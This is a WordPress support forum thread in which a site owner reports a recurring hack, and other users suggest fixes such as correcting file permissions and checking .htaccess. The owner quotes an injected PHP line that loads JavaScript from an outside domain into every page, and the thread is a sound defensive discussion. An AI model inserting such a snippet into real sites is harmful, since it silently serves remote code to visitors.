• orchidred

    (@orchidred)


    My site has been hacked twice this month and I can’t figure out how. It begins with my-hacks.php, where WP tells me that there headers were already sent. Opening my-hacks reveals that this bit of code has somehow been added to the file:

    <? if (!defined(‘domainstat’)) { define(“domainstat”, “ok”); echo “<script language=’JavaScript’ type=’text/javascript’ src=’https://domainstat.net/stat.php’></script>&#8221;;}?>

    Deleting that bit of code causing all my plugin and admin.php files to stop working and stylsheet.css stops working. The last time this happened the hack got progressively worse, eventually changing all my post links to a new link that sent people to a hardcore porno video.

    How is this happening? Anyone know how I can prevent it? Fix it?? HELP!!

Viewing 15 replies - 16 through 30 (of 65 total)
  • whooami

    (@whooami)

    fyi, your blog site .. the permalinks as well as the comment links are prompting me to download a .wmv file (windows media file) and nope I’m not up for being a guinie pig and seeing what it is. I appear to be doing this as youre messing with things since it has just stopped but looking at your source it looks like you put back the snippit of js in the header, as they all apeear to be working as normally, but loading rather slow.

    By the way, these sorts of javascript issues are becoming a reoccurring topic on the forums, again :

    NO FILES SHOULD BE CHMOD 666 OR 777 AS A RULE (ON ANY SITE, REGARDLESS OF WHAT SOFTWARE OR APPLICATIONS YOU ARE USING).

    WordPress allows you to edit files via the admin area, but trust me when I say that thats a huge issue as that requires word-writable files. If you are insistent on editing files that way, it is best that you do it, and then chmod any files you edited back to the correct permissions (644 or 755, respectively).

    It’s worth noting also that wp-cache, I presume, requires a whole directories worth of files be world-writable.

    Thread Starter orchidred

    (@orchidred)

    — deleted, duplicate post —-

    Thread Starter orchidred

    (@orchidred)

    Whooami, that wmv file is a porno video, that’s the same thing that happened the last time my site was hacked.

    As for messing with the site, that’s really disturbing that you said files are changing because I haven’t done anything to it since starting this thread. The only thing I did (before posting here) was delete the js, but it reappeared soon afterwards.

    Thread Starter orchidred

    (@orchidred)

    Orlo, yes please do email me. I can be reached at amadai at gmail dot com.

    Thread Starter orchidred

    (@orchidred)

    whooami, good to know. I’m definately not going to edit files in WP anymore.

    whooami

    (@whooami)

    OrchidRed, I know.. which is why Im not guinie pig it..Good luck, Im afraid its snowing, and I am off to work..

    TechGnome

    (@techgnome)

    Have you looked to see if there’s an .htaccess file? Some one may have dumped one there that’s causing the redirects to the wmv file. it’s just a guess though.

    -tg

    vkaryl

    (@vkaryl)

    Two possibles spring to mind, kestrel. Either you have totally pissed off the world’s greatest hacker (hopefully not, but if that’s it I don’t think we can help you!); or your host has some sort of security problem of their own (or a dodgy employee – not really likely, but has been known to happen….)

    If they put you on a new server, and you had nothing there BUT WP 1.5.2 (which so far and crossing fingers hasn’t any obvious open sores far as vulnerabilities go), it’s perhaps time to ask them again if they have a problem somewhere….

    TG has a good point as well: because if your first-hacked install was due to someone dropping a dirty .htaccess in your folder, you might have moved it along with your blog when you moved to the new server.

    Also, have you used phpMyAdmin to look at your database, to see if there are tables which don’t belong there?

    orlo

    (@orlo)

    I talked to kestrel – and it seems the provider has a bigger problem… the log file shows that some script is spreading across different clients/users on the same server- so I am not really sure if WP was the problem to start with… but changing the access rights should help a little… I think the provider will eventually figure it out ??

    seems like they are responding fast…

    as i said before- seems like a couple of servers are affected (see google)…

    vkaryl

    (@vkaryl)

    Ouch. Thanks for the report, orlo. Any chance you or kestrel would be willing to state which host, in case there are others who will be looking for info on the problem?

    moshu

    (@moshu)

    Among “others” consider this guy:
    https://www.ads-software.com/support/topic/50701#post-278892

    orlo

    (@orlo)

    the provider is looking at the issue on a general level – at least that was my understanding- they found a log file (created by the malicious script which listed all files that where infected… seems like they are going through their servers right now…
    maybe kestrel can tell you more as sson as they are done…

    JamesM

    (@righton)

    So if I email my host about this, they should be able to assist me you think?

    My issue is I have one of these scripts in front of my DOCTYPE, and it’s not visible in the template file… I can’t find it anywhere.

    Thread Starter orchidred

    (@orchidred)

    Hi all, sorry for not responding sooner I was at work and didn’t have computer access.

    My host thinks there is a file somewhere in the root folder of my server and that it has been systematically rewriting every WP file on the _entire_ server, so it’s not just my account. They think this is the case because they found a txt file that has been logging all the files that have been corrupted.

    It seems like it only rewrites WP files because non-WP php files haven’t been affected. (We’re guessing that it exploits the fact that many of them were CHMOD to 666 like whooami said?) It completely messes up the admin panel and turns comments/permalinks into links to a wmv porno file.

    That’s all I know. My host temporarily stopped the attack by freezing some folders, but they haven’t been able to find the file that is responsible for all this.

    vkaryl

    (@vkaryl)

    Well, if we don’t know which particular host is affected…. I would think this should be a general heads-up to EVERYONE to check over your file permissions and reset anything 666 or higher back to a “reasonable level” – 644 for files and 755 for folders….

Viewing 15 replies - 16 through 30 (of 65 total)
  • The topic ‘WP Hacked Twice’ is closed to new replies.